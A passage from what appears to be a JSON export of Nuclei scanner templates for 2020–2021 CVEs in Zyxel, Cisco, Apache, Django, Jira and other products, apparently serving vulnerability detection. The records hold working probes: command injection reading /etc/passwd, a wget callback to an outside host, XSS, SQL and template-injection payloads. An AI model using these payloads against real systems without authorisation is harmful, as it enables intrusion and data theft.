product: exacqvision_enterprise_manager\n tags: cve,cve2020,rce,exacqvision,johnsoncontrols\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/version.web\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"3.10.4.72058\"\n - \"3.12.4.76544\"\n - \"3.8.2.67295\"\n - \"7.0.2.81005\"\n - \"7.2.7.86974\"\n - \"7.4.3.89785\"\n - \"7.6.4.94391\"\n - \"7.8.2.97826\"\n - \"8.0.6.105408\"\n - \"8.2.2.107285\"\n - \"8.4.3.111614\"\n - \"8.6.3.116175\"\n - \"8.8.1.118913\"\n - \"9.0.3.124620\"\n - \"9.2.0.127940\"\n - \"9.4.3.137684\"\n - \"9.6.7.145949\"\n - \"9.8.4.149166\"\n - \"19.03.3.152166\"\n - \"19.06.4.157118\"\n - \"19.09.4.0\"\n - \"19.12.2.0\"\n - \"20.03.2.0\"\n - \"20.06.3.0\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201bb09c86a03cdad4b55f9720c8a87b38362c69ac91148afe70b9d98329a7f06902200a275aacb80cb3b7fe0f4364359d9de1b96dd30f7f64ae230e7d81cf79aa25a6:922c64590222798bb761d5b6d8e72950", "hash": "c8b219f4b3b2e855d9797b5646e667d8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30824e" }, "name": "CVE-2020-9054.yaml", "content": "id: CVE-2020-9054\n\ninfo:\n name: Zyxel NAS Firmware 5.21- Remote Code Execution\n author: dhiyaneshDk\n severity: critical\n description: 'Multiple Zyxel network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. Zyxel NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the Zyxel device. 
Although the web server does not run as the root user, Zyxel devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable Zyxel device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable device. For example, simply visiting a website can result in the compromise of any Zyxel device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 Zyxel has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. 
Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2.'\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.\n remediation: |\n Apply the latest firmware update provided by Zyxel to mitigate this vulnerability.\n reference:\n - https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/\n - https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9054\n - https://kb.cert.org/vuls/id/498544/\n - https://cwe.mitre.org/data/definitions/78.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-9054\n cwe-id: CWE-78\n epss-score: 0.96978\n epss-percentile: 0.99679\n cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zyxel\n product: nas326_firmware\n tags: cve2020,cve,rce,zyxel,injection,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200f3db795bac6a39f0ab95221db22133a21ee123eaf7b2cbb5cc7a9ea0430fdaf022053244d01dda45456c1650e9b3d1268931b4378212caa405aef51a2348bb5b9c3:922c64590222798bb761d5b6d8e72950", "hash": "06d1725a977377ec395132ff7576bbfb", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30824f" }, "name": "CVE-2020-9315.yaml", "content": "id: CVE-2020-9315\n\ninfo:\n name: Oracle iPlanet Web Server 7.0.x - Authentication Bypass\n author: dhiyaneshDk\n severity: high\n description: |\n Oracle iPlanet Web Server 7.0.x has incorrect access control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. 
NOTE a related support policy can be found in the www.oracle.com references attached to this CVE.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected system.\n remediation: |\n Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability.\n reference:\n - https://www.cvebase.com/cve/2020/9315\n - https://www.oracle.com/support/lifetime-support/\n - https://www.oracle.com/us/assets/lifetime-support-middleware-069163.pdf\n - https://wwws.nightwatchcybersecurity.com/2020/05/10/two-vulnerabilities-in-oracles-iplanet-web-server-cve-2020-9315-and-cve-2020-9314/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9315\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-9315\n cwe-id: CWE-306\n epss-score: 0.97337\n epss-percentile: 0.9988\n cpe: cpe:2.3:a:oracle:iplanet_web_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: oracle\n product: iplanet_web_server\n tags: cve,cve2020,oracle,auth-bypass,iplanet\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2\"\n - \"{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Admin Console\"\n\n - type: word\n words:\n - \"serverConfigurationsGeneral\"\n - \"serverCertificatesGeneral\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206d1b411ea76e89ae1bbd022c4ab57bac51f3fa12b871736779e3d1a35fd883c0022100a71b8922e865146caede677ee0e73b855ba1dad6aceefa4f667aaea98db2e147:922c64590222798bb761d5b6d8e72950", "hash": "5e3c844c1d33a038b2166b5d07057f27", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308250" }, "name": "CVE-2020-9344.yaml", "content": "id: 
CVE-2020-9344\n\ninfo:\n name: Jira Subversion ALM for Enterprise <8.8.2 - Cross-Site Scripting\n author: madrobot\n severity: medium\n description: Jira Subversion ALM for Enterprise before 8.8.2 contains a cross-site scripting vulnerability at multiple locations.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: |\n Upgrade Jira Subversion ALM for Enterprise to version 8.8.2 or later to mitigate this vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9344\n - https://kintosoft.atlassian.net/wiki/spaces/SVNALM/pages/753565697/Security+Bulletin\n - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-007.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13483\n - https://github.com/merlinepedra/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-9344\n cwe-id: CWE-79\n epss-score: 0.00205\n epss-percentile: 0.5782\n cpe: cpe:2.3:a:atlassian:subversion_application_lifecycle_management:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 5\n vendor: atlassian\n product: subversion_application_lifecycle_management\n shodan-query: http.component:\"Atlassian Jira\"\n tags: cve2020,cve,atlassian,jira,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'\n - '{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS'\n - '{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'\n - '{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test'\n - 
'{{BaseURL}}/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"jira\"\n - \"subversion\"\n condition: and\n case-insensitive: true\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f1f8769608644c41386a233cb78ccae42d519ed0ec714381e3823a863f658ed602201ec7768a3888515d76ca4ff5c22cc3b1321f45fb03c25603ed94f79898b132b0:922c64590222798bb761d5b6d8e72950", "hash": "5bcdbd1a7ba34f6ae151fcde60ba9d94", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308251" }, "name": "CVE-2020-9376.yaml", "content": "id: CVE-2020-9376\n\ninfo:\n name: D-Link DIR-610 Devices - Information Disclosure\n author: whynotke\n severity: high\n description: |\n D-Link DIR-610 devices allow information disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.\n NOTE: This vulnerability only affects products that are no longer supported by the maintainer.\n impact: |\n An attacker can gain sensitive information from the device, leading to potential unauthorized access or further attacks.\n remediation: |\n Apply the latest firmware update provided by D-Link to fix the vulnerability.\n reference:\n - https://gist.github.com/GouveaHeitor/dcbb67b301cc45adc00f8a6a2a0a590f\n - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182\n - https://www.dlink.com.br/produto/dir-610/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9376\n - https://github.com/Z0fhack/Goby_POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-9376\n cwe-id: CWE-74\n epss-score: 0.96966\n epss-percentile: 0.99713\n cpe: cpe:2.3:o:dlink:dir-610_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dlink\n product: dir-610_firmware\n tags: 
cve,cve2020,dlink,disclosure,router\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/getcfg.php\"\n\n body: SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Admin\"\n - \"\"\n - \"\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e98012a37e1c7449138264fa67d0e0279ae5c6f631e4da99cd419bfc34ce7c0e02204622d06279cc4f997a1f316f033a87f60a7bb8f2219b1b24f27692ca69ed8092:922c64590222798bb761d5b6d8e72950", "hash": "eb93f706bc6cef0c859b598716336e1e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308252" }, "name": "CVE-2020-9402.yaml", "content": "id: CVE-2020-9402\n\ninfo:\n name: Django SQL Injection\n author: geeknik\n severity: high\n description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. 
By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: Upgrade to the latest version.\n reference:\n - https://www.debian.org/security/2020/dsa-4705\n - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402\n - https://docs.djangoproject.com/en/3.0/releases/security/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9402\n - https://groups.google.com/forum/#!topic/django-announce/fLUh_pOaKrY\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-9402\n cwe-id: CWE-89\n epss-score: 0.14117\n epss-percentile: 0.95552\n cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: djangoproject\n product: django\n tags: cve,cve2020,django,sqli,vulhub,djangoproject\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1\"\n\n matchers:\n - type: word\n words:\n - \"DatabaseError at\"\n - \"ORA-29257:\"\n - \"ORA-06512:\"\n - \"Request Method:\"\n condition: and\n# digest: 4a0a00473045022100ccf3113bbf0b9acac23cb361dc7f354995e653943ccb6f448a8fb6a883c4071302205350ce4634728a65fbf460c2adf249a31f93c769451b8969561f2c1d50f9d980:922c64590222798bb761d5b6d8e72950", "hash": "8f228ab0a1d8d2092bacb53571187543", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308253" }, "name": "CVE-2020-9425.yaml", "content": "id: CVE-2020-9425\n\ninfo:\n name: rConfig <3.9.4 - Sensitive Information Disclosure\n author: madrobot\n severity: high\n description: rConfig prior to version 3.9.4 is susceptible to sensitive 
information disclosure. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executes, resulting in the disclosure of cleartext credentials in the response.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, such as usernames and passwords.\n remediation: |\n Upgrade rConfig to version 3.9.4 or later to fix the vulnerability.\n reference:\n - https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153\n - https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9425\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-9425\n cwe-id: CWE-670\n epss-score: 0.01611\n epss-percentile: 0.86058\n cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: rconfig\n product: rconfig\n tags: cve,cve2020,rconfig.exposure,rconfig\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/settings.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"defaultNodeUsername\"\n - \"defaultNodePassword\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210097bd62e865ddc5a66964df63555a520511d79d0a43a5efbe2ec58a057de20434022100b3494688001927c623591a7583963320e5605ace9d2a8dc63c05f693ac3e9297:922c64590222798bb761d5b6d8e72950", "hash": "58c52cafa7a80144da75ba0341b1e4c1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308254" }, "name": "CVE-2020-9483.yaml", "content": "id: CVE-2020-9483\n\ninfo:\n name: SkyWalking SQLI\n author: pikpikcu\n severity: high\n description: |\n When using H2/MySQL/TiDB as Apache SkyWalking storage and a metadata query through GraphQL protocol, there is a SQL injection 
vulnerability which allows access to unexpected data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest security patches or updates provided by the SkyWalking project to fix the SQL injection vulnerability.\n reference:\n - https://github.com/apache/skywalking/pull/4639\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9483\n - https://github.com/Elsfa7-110/kenzer-templates\n - https://github.com/developer3000S/PoC-in-GitHub\n - https://github.com/pen4uin/awesome-vulnerability-research\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-9483\n cwe-id: CWE-89\n epss-score: 0.0522\n epss-percentile: 0.92833\n cpe: cpe:2.3:a:apache:skywalking:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: skywalking\n tags: cve,cve2020,sqli,skywalking,apache\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/graphql\"\n\n body: |\n {\"query\":\"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\\\"all_p99\\\",id:\\\"') UNION SELECT 1,CONCAT('~','9999999999','~')-- \\\",}, duration: $d){values{value}}}\",\"variables\":{\"d\":{\"start\":\"2021-11-11\",\"end\":\"2021-11-12\",\"step\":\"DAY\"}}}\n\n headers:\n Content-Type: application/json\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"Content-Type: application/json\"\n\n - type: word\n part: body\n words:\n - \"UNION SELECT 1,CONCAT('~','9999999999','~')--\"\n - 'Exception while fetching data'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 
4a0a0047304502201024425cbbd282e119ced24601c58cf9f2b99756be728bcc7f6f876917cf5909022100e43816008bda23d059ebc830cb5e9db84a99234636b245f09230bc663d39746f:922c64590222798bb761d5b6d8e72950", "hash": "05dad0afd5b72b950970b7936aa303af", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308255" }, "name": "CVE-2020-9484.yaml", "content": "id: CVE-2020-9484\n\ninfo:\n name: Apache Tomcat Remote Command Execution\n author: dwisiswant0\n severity: high\n description: |\n When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if\n a) an attacker is able to control the contents and name of a file on the server; and\n b) the server is configured to use the PersistenceManager with a FileStore; and\n c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter=\"null\" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and\n d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control.\n Note that all of conditions a) to d) must be true for the attack to succeed.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution, allowing attackers to execute arbitrary commands on the affected system.\n remediation: |\n Apply the latest security patches provided by Apache to mitigate this vulnerability.\n reference:\n - http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9484\n - https://lists.apache.org/thread.html/r77eae567ed829da9012cadb29af17f2df8fa23bf66faf88229857bb1%40%3Cannounce.tomcat.apache.org%3E\n - 
https://lists.apache.org/thread.html/rf70f53af27e04869bdac18b1fc14a3ee529e59eb12292c8791a77926@%3Cusers.tomcat.apache.org%3E\n - http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00057.html\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7\n cve-id: CVE-2020-9484\n cwe-id: CWE-502\n epss-score: 0.92769\n epss-percentile: 0.98967\n cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: tomcat\n shodan-query: title:\"Apache Tomcat\"\n tags: cve2020,cve,rce,packetstorm,apache,tomcat\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.jsp\"\n\n headers:\n Cookie: \"JSESSIONID=../../../../../usr/local/tomcat/groovy\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Exception\"\n - \"ObjectInputStream\"\n - \"PersistentManagerBase\"\n condition: and\n\n - type: status\n status:\n - 500\n# digest: 4a0a0047304502200c88732807072e4a6338643df18beacf7f55f33b12f14afd156a824a3b356fbd022100cf87ad99a473933a67e31655bbb149fa818e982f9a341cd2d84c75cea140afaf:922c64590222798bb761d5b6d8e72950", "hash": "ba71cd9536460f9790aa87adedf3e7a9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308256" }, "name": "CVE-2020-9496.yaml", "content": "id: CVE-2020-9496\n\ninfo:\n name: Apache OFBiz 17.12.03 - Cross-Site Scripting\n author: dwisiswant0\n severity: medium\n description: Apache OFBiz 17.12.03 contains cross-site scripting and unsafe deserialization vulnerabilities via an XML-RPC request.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or upgrade to a non-vulnerable version of Apache OFBiz.\n reference:\n - 
http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html\n - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html\n - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz\n - https://s.apache.org/l0994\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9496\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-9496\n cwe-id: CWE-502\n epss-score: 0.89561\n epss-percentile: 0.98689\n cpe: cpe:2.3:a:apache:ofbiz:17.12.03:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: ofbiz\n tags: cve,cve2020,ofbiz,packetstorm,apache,java\n\nhttp:\n - raw:\n - |\n POST /webtools/control/xmlrpc HTTP/1.1\n Host: {{Hostname}}\n Origin: http://{{Hostname}}\n Content-Type: application/xml\n\n ProjectDiscoverydwisiswant0\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"faultString\"\n - \"No such service [ProjectDiscovery]\"\n - \"methodResponse\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"Content-Type: text/xml\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206995e8b04712ff12a7cc6259c6023a6f173a130e97bdbe8eeedb0a48258d92ec02210088b782bfd12b1d37ead9da796f4c265fadd35a83d0fdab5cbc2a3352abb19f49:922c64590222798bb761d5b6d8e72950", "hash": "fad757b2cea3638d0b49c6e746424a27", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308257" }, "name": "CVE-2020-9757.yaml", "content": "id: CVE-2020-9757\n\ninfo:\n name: Craft CMS < 3.3.0 - Server-Side Template Injection\n author: dwisiswant0\n severity: critical\n description: Craft CMS before 3.3.0 is susceptible to server-side template injection via the SEOmatic component that could lead to remote code execution via malformed data submitted to the metacontainers controller.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code 
on the server.\n remediation: |\n Upgrade Craft CMS to version 3.3.0 or higher to mitigate this vulnerability.\n reference:\n - https://github.com/nystudio107/craft-seomatic/blob/v3/CHANGELOG.md\n - https://github.com/giany/CVE/blob/master/CVE-2020-9757.txt\n - https://github.com/nystudio107/craft-seomatic/commit/65ab659cb6c914c7ad671af1e417c0da2431f79b\n - https://github.com/nystudio107/craft-seomatic/commit/a1c2cad7e126132d2442ec8ec8e9ab43df02cc0f\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9757\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-9757\n cwe-id: CWE-74\n epss-score: 0.96518\n epss-percentile: 0.99576\n cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: craftcms\n product: craft_cms\n tags: cve,cve2020,ssti,craftcms\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}\"\n - \"{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}\"\n\n skip-variables-check: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"MetaLinkContainer\"\n - \"canonical\"\n - \"22344\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ecfcc24163fa9d5a764dd7f1d6bc59d23a3cb69c7c3ca9bf2b3d0a9f92d38fba022100f48bd5a9fde0ece8cf3a033e1fde317110d9ef706c9a178ab65cf6f5bad96f5a:922c64590222798bb761d5b6d8e72950", "hash": "9a81dc053de58110fca39c2f768f5fc8", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308258" }, "name": "CVE-2021-1472.yaml", "content": "id: CVE-2021-1472\n\ninfo:\n name: Cisco Small Business RV Series - OS Command Injection\n author: gy741\n severity: critical\n description: |\n Cisco Small Business RV Series routers RV16X/RV26X versions 1.0.01.02 and before and RV34X versions 1.0.03.20 and before contain multiple OS command injection vulnerabilities in the web-based 
management interface. A remote attacker can execute arbitrary OS commands via the sessionid cookie or bypass authentication and upload files on an affected device.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected device.\n remediation: |\n Apply the latest security patches or firmware updates provided by Cisco to mitigate this vulnerability.\n reference:\n - https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/\n - https://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-1472\n - https://nvd.nist.gov/vuln/detail/CVE-2021-1473\n - http://seclists.org/fulldisclosure/2021/Apr/39\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-1472\n cwe-id: CWE-287,CWE-119\n epss-score: 0.97174\n epss-percentile: 0.99793\n cpe: cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: cisco\n product: rv160_firmware\n shodan-query: http.html:\"Cisco rv340\"\n tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive\n\nhttp:\n - raw:\n - |\n POST /upload HTTP/1.1\n Host: {{Hostname}}\n Cookie: sessionid='`wget http://{{interactsh-url}}`'\n Authorization: QUt6NkpTeTE6dmk4cW8=\n Content-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536\n\n -----------------------------392306610282184777655655237536\n Content-Disposition: form-data; name=\"option\"\n\n 5NW9Cw1J\n -----------------------------392306610282184777655655237536\n Content-Disposition: form-data; name=\"destination\"\n\n J0I5k131j2Ku\n -----------------------------392306610282184777655655237536\n Content-Disposition: form-data; name=\"file.path\"\n\n EKsmqqg0\n 
-----------------------------392306610282184777655655237536\n Content-Disposition: form-data; name=\"file\"; filename=\"config.xml\"\n Content-Type: application/xml\n\n qJ57CM9\n -----------------------------392306610282184777655655237536\n Content-Disposition: form-data; name=\"filename\"\n\n JbYXJR74n.xml\n -----------------------------392306610282184777655655237536\n Content-Disposition: form-data; name=\"GXbLINHYkFI\"\n\n configurationFILE://Configuration/config.xmlconfig-running\n -----------------------------392306610282184777655655237536--\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - http\n\n - type: word\n part: body\n words:\n - '\"jsonrpc\":'\n# digest: 4a0a0047304502207d2afae99f9b9e0f78952b1cccf9209e11e2cab61e200b590312046dcd5acbfd0221009ae723766dfe0df8dd26b8392a3a3c7a690658e170dc65292bdb3dbe49de9ace:922c64590222798bb761d5b6d8e72950", "hash": "345c51ed1302164da6df009299c1e1d7", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308259" }, "name": "CVE-2021-1497.yaml", "content": "id: CVE-2021-1497\n\ninfo:\n name: Cisco HyperFlex HX Data Platform - Remote Command Execution\n author: gy741\n severity: critical\n description: Cisco HyperFlex HX contains multiple vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.\n remediation: |\n Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability.\n reference:\n - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-1497\n - https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html\n - https://twitter.com/Unit42_Intel/status/1402655493735206915\n - https://twitter.com/ptswarm/status/1390300625129201664\n - 
